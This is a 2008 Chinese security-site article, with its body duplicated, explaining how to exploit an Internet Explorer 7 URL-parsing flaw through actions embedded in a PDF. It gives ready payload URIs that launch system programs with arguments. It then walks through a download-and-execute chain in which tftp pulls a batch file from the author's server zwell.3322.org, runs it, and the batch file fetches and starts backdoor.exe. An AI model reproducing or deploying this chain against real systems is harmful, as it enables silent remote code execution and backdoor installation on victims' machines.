URL解析漏洞在PDF文档中的利用
互联网 发布时间:2008-10-08 20:05:12 作者:佚名 
我要评论
我要评论右键另存再打开测试文档,否则会调用IE的插件打开,测试会失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。
在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年
右键另存再打开测试文档,否则会调用IE的插件打开,测试会失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。
在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年有一个关于pdf actions安全隐患的这么一个问题(参看http://michaeldaw.org/md-hacks/backdooring-pdf-files/),pdf中的actions中打开页面的事件刚好可以用来利用。
Petko Petkov之前放出话说pdf的0day应该也就是指的是这个漏洞了。利用这个漏洞首先需要安装IE7,在URL解析时遇到百分号(%)会执行后面的程序。放出来的利用方式为:
mailto:test%../../../../windows/system32/calc.exe".cmd
http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat
利用这种URL咱们可以执行系统中的任意命令了,但是有一点用处的系统命令都得加参数才能用啊。怎么加入参数呢?反正放在.cmd前就行,但是必须放在引号(")后面,呵呵,其实没的选。经过测试,下面的语句就ok了:
mailto:test%../../../../windows/system32/net.exe" “user”.cmd
要有多个参数的话就的
mailto:test%../../../../windows/system32/xxx.exe" “argv1” ”argv2“.cmd
到这里,基本上大家也就有了利用办法了,网络COPY命令,TFTP等都行啊。不过得分两步:
1.下载程序
2.执行程序
还有一点要注意的,最好在打开页面事件和关闭页面时间中加入上面两步,以免因为网速问题造成程序执行不成功。
mailto:test%..\..\..\..\windows\system32\tftp.exe" "-i" "zwell.3322.org" "GET" "a.bat" "c:\a".cmd
mailto:test%..\..\..\..\windows\system32\cmd.exe" "/c c:\a".cmd
在zwell.3322.org上我搭建了一个TFTP服务器,里面放有一个a.cmd,内容就是再去下载执行一个程序。
在pdf打开首页时执行第一条指令,下载服务器上的a.bat,保存为a.cmd(为什么是cmd,大家可以思考一下)。
在离开该页面时,再执行已经下载的a.cmd,其实他是个bat文件,内容是:
cmd /c tftp -i zwell.3322.org GET backdoor.exe c:\b.exe
start c:\b.exe
好了,现在下载了backdoor.exe程序(这只是一个notepad程序,我重命名了)并且执行了。gameover。
在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年有一个关于pdf actions安全隐患的这么一个问题(参看http://michaeldaw.org/md-hacks/backdooring-pdf-files/),pdf中的actions中打开页面的事件刚好可以用来利用。
Petko Petkov之前放出话说pdf的0day应该也就是指的是这个漏洞了。利用这个漏洞首先需要安装IE7,在URL解析时遇到百分号(%)会执行后面的程序。放出来的利用方式为:
mailto:test%../../../../windows/system32/calc.exe".cmd
http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat
利用这种URL咱们可以执行系统中的任意命令了,但是有一点用处的系统命令都得加参数才能用啊。怎么加入参数呢?反正放在.cmd前就行,但是必须放在引号(")后面,呵呵,其实没的选。经过测试,下面的语句就ok了:
mailto:test%../../../../windows/system32/net.exe" “user”.cmd
要有多个参数的话就的
mailto:test%../../../../windows/system32/xxx.exe" “argv1” ”argv2“.cmd
到这里,基本上大家也就有了利用办法了,网络COPY命令,TFTP等都行啊。不过得分两步:
1.下载程序
2.执行程序
还有一点要注意的,最好在打开页面事件和关闭页面时间中加入上面两步,以免因为网速问题造成程序执行不成功。
mailto:test%..\..\..\..\windows\system32\tftp.exe" "-i" "zwell.3322.org" "GET" "a.bat" "c:\a".cmd
mailto:test%..\..\..\..\windows\system32\cmd.exe" "/c c:\a".cmd
在zwell.3322.org上我搭建了一个TFTP服务器,里面放有一个a.cmd,内容就是再去下载执行一个程序。
在pdf打开首页时执行第一条指令,下载服务器上的a.bat,保存为a.cmd(为什么是cmd,大家可以思考一下)。
在离开该页面时,再执行已经下载的a.cmd,其实他是个bat文件,内容是:
cmd /c tftp -i zwell.3322.org GET backdoor.exe c:\b.exe
start c:\b.exe
好了,现在下载了backdoor.exe程序(这只是一个notepad程序,我重命名了)并且执行了。gameover。
相关文章
2019最新RDP远程桌面漏洞官方补丁(针对win2003、win2008)
Windows系列服务器于2019年5月15号,被爆出高危漏洞,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口332021-07-25
宝塔面板 phpmyadmin 未授权访问漏洞 BUG ip:888/pma的问题分析
这篇文章主要介绍了宝塔面板 phpmyadmin 未授权访问漏洞 BUG ip:888/pma,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下2020-08-24
CPU幽灵和熔断漏洞是什么?Intel为大家简单易懂的科普了一番
不久前让整全行业紧张、全球用户恐慌的Spectre幽灵、Meltdown熔断两大漏洞事件刚刚告一段落了,那么这两个漏洞到底是什么?可能还有很多人不是很清楚,想了解的朋友跟着小2018-03-21
2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密,本文对其2017-05-17- 大部分的用户可能不要了解文件上传漏洞,下面小编就为大家具体的讲解什么事文件上传漏洞以及文件上传漏洞的几种方式2016-11-02
- 漏洞检测工具用语有高危漏洞,中危漏洞,低危漏洞以及漏洞的危害介绍,本文介绍的非常详细,具有参考解决价值,感兴趣的朋友一起看看吧2016-10-11
- 漏洞无处不在,它是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统2016-09-29
手把手教你如何构造Office漏洞POC(以CVE-2012-0158为例)
近年来APT追踪盛行,最常见的就是各种以钓鱼开始的攻击,不仅仅有网站挂马式钓鱼,也有鱼叉式邮件钓鱼,下面小编就为大家介绍office漏洞CVE-2012-0158,一起来看看吧2016-09-28- SSL(安全套接字层)逐渐被大家所重视,但是最不能忽视的也是SSL得漏洞,随着SSL技术的发展,新的漏洞也就出现了,下面小编就为大家介绍简单七步教你如何解决关键SSL安全问题2016-09-23
- 在爬虫开发中,大家可以很轻易地 bypass 所谓的 UA 限制,甚至用 scrapy 框架轻易实现按照深度进行爬行。但是实际上,这些并不够。关于爬虫的基础知识比如数据处理与数据存2016-09-12
最新评论